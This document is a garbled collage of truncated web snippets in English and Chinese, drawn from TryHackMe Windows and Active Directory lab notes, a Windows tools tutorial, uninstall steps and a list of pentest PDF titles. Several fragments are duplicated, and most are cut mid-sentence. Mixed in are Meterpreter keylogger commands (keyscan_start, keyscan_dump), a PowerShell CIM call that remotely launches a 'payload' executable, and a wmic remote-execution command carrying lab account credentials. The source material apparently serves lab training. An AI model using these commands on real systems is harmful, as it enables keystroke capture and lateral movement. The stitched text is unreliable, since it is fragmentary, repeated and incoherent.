An example of execution is provided here (section exploit AD user) :➤ Execute the keylogger through a meterpreter session (Metasploit)# Start the keylogger meterpreter > keyscan_start # Dump captured key strokes meterpreter > keyscan_dump # Stop the ... Everything which is Windows privilege escalation Resources Readme Activity Stars 0 ...
TryHackMe Room A Windows Domain allows management of large computer networks They use a Windows server called a DC (domain controller) A DC is any server that has Active Directory domain services role DC respond to authentication requests across the domain ...
导航到MSConfig面板的工具选项卡并找到“资源监视器”工具,查看“Selected command”部分即可。 答案:resmon.exe 命令提示符界面 我们将继续探索可通过“系统配置”面板使用的工具——Command Prompt(cmd)。 命令提示符(cmd)一开始似乎令人生畏,但一旦你了解如何与它进行交互,你就会发现它没有那么难理解。 在早期的操...
手動移除 db 方法1: If you are running an x86 based edition use msiexec /x {CEB5780F-1A70-44A9-850F-DE6C4F6AA8FB} CALLERID=ocsetup.exe If you are running an x64 based edition use msiexec /x {BDD79957-5801-4A2D-B09E-852E7FA64D01} CALLERID=ocsetup.exe 方法2(請先備份相關登錄檔...
$Command="cmd.exe /c C:\tmp\b.exe";# payloadInvoke-CimMethod-CimSession$Session-ClassName Win32_Process-MethodName Create-Arguments @{CommandLine =$Command} 1. 2. 3. 4. 5. 或者 wmic/user:ZA.TRYHACKME.COM\t1_corine.waters/password:Korine.1994/node: create"cmd.exe...
$Command="cmd.exe /c C:\tmp\b.exe";# payloadInvoke-CimMethod-CimSession$Session-ClassName Win32_Process-MethodName Create-Arguments @{CommandLine =$Command} 1. 2. 3. 4. 5. 或者 wmic/user:ZA.TRYHACKME.COM\t1_corine.waters/password:Korine.1994/node: create"cmd.exe...
TryHackMe DailyBugle Writeup - Exploiting Joomla Version 3.7.0.pdf Add files via upload Aug 5, 2020 Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments .pdf Add files via upload Jul 31, 2020 UAC bypass through Trusted Folder abuse.pdf Add files ...
TryHackMe DailyBugle Writeup - Exploiting Joomla Version 3.7.0.pdf Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments .pdf UAC bypass through Trusted Folder abuse.pdf WPScan:WordPress Pentesting Framework.pdf Windows Firewall Post Exploitation with Ne...
An example of execution is provided here (section exploit AD user) :➤ Execute the keylogger through a meterpreter session (Metasploit)# Start the keylogger meterpreter > keyscan_start # Dump captured key strokes meterpreter > keyscan_dump # Stop the ...